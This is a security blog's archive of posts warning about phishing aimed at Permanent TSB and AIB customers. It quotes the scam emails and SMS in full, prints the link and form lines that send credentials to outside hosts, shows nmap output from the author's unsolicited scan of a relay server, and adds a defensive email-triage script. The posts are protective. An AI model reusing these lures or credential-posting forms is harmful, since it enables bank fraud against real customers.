Tag Archive | "phishing"

Permanent TSB Phishing Scam




Permanent TSB customers are currently being targeted by a phishing scam that attempts to steal log-in information and passwords to the banking website.

If you happen to receive an email similar to the one below, do not respond or click on any links in the email.

Dear Esteem Customer

Due to multiple attempt error while trying to login in to your online Permanent TSB Online Account. We believed that someone other than you is trying to access your Account For security reasons, we have temporarily Flagged your account and your access to online banking will be restricted until this issue is solved.

Update your Permanent TSB Account now to enjoy the benefits of online banking and safer online banking experience.

Click here to proceed

Thanks for taking the time to learn about our upcoming plan for Enhance Online Security – it’s one more way that Permanent TSB online banking can makes your online banking experience better..


permanent tsb 56/59 St. Stephens Green, Dublin 2. Irish Life & Permanent plc (trading as permanent tsb) is regulated by the Central Bank of Ireland. Irish Life & Permanent plc. is a tied insurance agent for Irish Life Assurance plc.


Irish Life & Permanent plc is a limited liability company registered in Dublin under No. 222332. The company’s registered office is: Irish Life Centre, Lower Abbey Street, Dublin 1.

Closer investigation of the email shows that the link actually points to a Brazilian website.

<a href="http://www.cspconsultoria.eng.br/logs/easyweb.php">

The email which we investigated comes from an insecure mail server run by an Australian company.

Received: from User (mail.blighcapital.com.au [59.167.233.41])

Posted in News, Security | Comments (1)

New AIB SMS Scam




Mobile phone users have been receiving text messages that claim to be from AIB Bank.

The text appears to come from sender: AIB

The message is as follows:

“Your AIB code card has been locked for security reasons due to recent fraud attempts. please visit http://www.aib-security.org to update your account”

If you receive a message like this do not visit the website as it is fraudulent and not operated by AIB Bank.

Although not confirmed, IT Security Consultant Alan O’Regan from Secured.ie reports that the fraudsters are using popular national websites like donedeal.ie to harvest Irish mobile numbers.

Posted in General, Hacking, News, Security | Comments Off

57000 Bogus Websites Created Weekly




It has been reported that cyber criminals are creating as many as 57000 websites every week in a bid to obtain data from unsuspecting people. Many of these websites are made to look exactly like the sites you regularly use, such as Visa, Amazon, eBay, PayPal etc.


The bogus websites are often made to look exactly like those of legitimate bank, auction, or shopping websites. The threat arises when users are unable to determine the authenticity of the websites when they click into them through search engines or email messages. While search engines and various security software companies do try to thwart the efforts of the hackers, they can’t eliminate all the risks. This is why users need to be extremely vigilant when logging onto these websites.

According to Panda Labs, 2/3 of these bogus websites are related to banking websites. “Given the proliferation of this technique, we advise consumers to visit banking sites or online stores by typing in the address in the browser directly rather than using search engines or links in an email,” Corrons said.

While typing in the address of the website will mitigate some attacks, it does not ensure complete safety, said Alan O’Regan from Secured.IE. Some of these attacks hijack DNS requests, so even though you have typed the correct website into the address bar you may still end up being diverted to a bogus website.


Posted in News, Security | Comments Off

The origin of an AIB Phishing Scam




Once again a spam e-mail message arrives in the inbox. On the surface it appears fairly ordinary. It’s an advertisement for Viagra or some cheap Chinese knock-off watches, written in poor English, trying to entice me to click onto some website. From time to time I like to investigate further as to how this message ended up being sent to my address.

A couple of weeks ago I received an email supposedly from Allied Irish Banks (alert@aib.ie).


Here is a copy of the email I received:

Dear AIB Online User,

We regret to inform you that access to your online account has been locked.

This happened because of too many failed log-in attempts.

To restore your online account access you can:

1. Visit your local branch and complete the Unlock My Account form (takes several days)

2. Complete the Unlock My Account form online, by downloading and completing the attached form (instant)

Quality service and the security of your account are of great importance to us.

We appreciate each opportunity to serve you.

Sincerely,

Customer Service

Attached to this email was an HTML document containing a form that requested my credentials and each of the one hundred 4-digit codes from my code card. At the top of the form the AIB logo was evident, and familiar buttons exactly the same as those that appear on the AIB website were included at the bottom, as can be seen in the screenshot below.

Taking a look at the source of this form, it could be seen that upon entering the details the information would not be sent to AIB but to some other address:

<form action="http://189.8.16.6/appserv/form1.php" method="post"


Having a closer look at the IP address 189.8.16.6, it turns out that this does not belong to AIB but in fact points to a Unitelco broadband customer in Brazil. What in heavens would he want all my AIB details for? I then emailed the abuse department of Unitelco informing them that one of their customers’ connections is involved in a phishing scam. To date I have not received a response.

Getting to the end of my investigation, or so I thought, I then decided to have a look at the headers of the email and see exactly where it came from.

Received: from toroonXXxXxxX3.sdsl.bell.ca (HELO XXXX.net) ([69.XX.203.XX])

It turned out that this IP address belonged to a marketing company in Canada.

An nmap of the IP revealed the following:

PORT     STATE  SERVICE
25/tcp   open   smtp
80/tcp   open   http
143/tcp  open   imap
443/tcp  open   https
993/tcp  open   imaps
1723/tcp open   pptp
3389/tcp open   ms-term-serv
8080/tcp open   http-proxy

I promptly contacted the company to let them know that not only are they running an open mail relay on Exchange (allowing anyone on the Internet to send e-mail through their server) but they also appeared to have a default install of Windows 2003 Server (not a very good idea). To date this appears still not to have been remedied.

So it turned out that the spam email was sent through a poorly secured server in Canada and, in the event of it finding someone susceptible enough to actually fill in the details, this information would be sent to a computer in Brazil. Luckily I didn’t fall for this one and my account balance has remained intact... for now.
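
The two checks made by hand in this post and in the Permanent TSB post (where the form or link actually sends data, and which relay the Received header names) can be scripted for mail triage. The following is an added example, not code from the original posts: the sample message is constructed, its IP addresses come from documentation ranges and its relay name is made up, and `Targets` and `analyse` are names chosen here.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample; IPs are RFC 5737 documentation addresses, relay name made up.
RAW = """\
Received: from relay.example.net (HELO mail.example.net) ([203.0.113.7])
From: AIB <alert@aib.ie>
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Complete the attached form.
--b1
Content-Type: text/html
Content-Disposition: attachment; filename="form.html"

<form action="http://198.51.100.9/appserv/form1.php" method="post"></form>
<a href="https://www.aib.ie/help">Help</a>
--b1--
"""

class Targets(HTMLParser):  # collects form actions and link hrefs
    def __init__(self):
        super().__init__()
        self.urls = []
    def handle_starttag(self, tag, attrs):
        wanted = {"form": "action", "a": "href"}.get(tag)
        self.urls += [v for k, v in attrs if k == wanted and v]

def analyse(raw):
    msg = message_from_string(raw)
    claimed = parseaddr(msg["From"])[1].rpartition("@")[2].lower()
    # IPs in header order; hops below your own mail server's line can be forged.
    relay_ips = re.findall(r"\[([\d.]+)\]", "\n".join(msg.get_all("Received", [])))
    parser = Targets()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            parser.feed(part.get_payload(decode=True).decode("utf-8", "replace"))
    hosts = [(u, (urlparse(u).hostname or "").lower()) for u in parser.urls]
    off = [u for u, h in hosts if h != claimed and not h.endswith("." + claimed)]
    return {"claimed": claimed, "relay_ips": relay_ips, "off_domain": off}

if __name__ == "__main__":
    print(analyse(RAW))
```

The From domain is only the brand the message claims to be, since that header is trivially spoofed; the useful signal is that the form posts to a host outside that domain.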


Posted in General, Hacking, News | Comments (1)
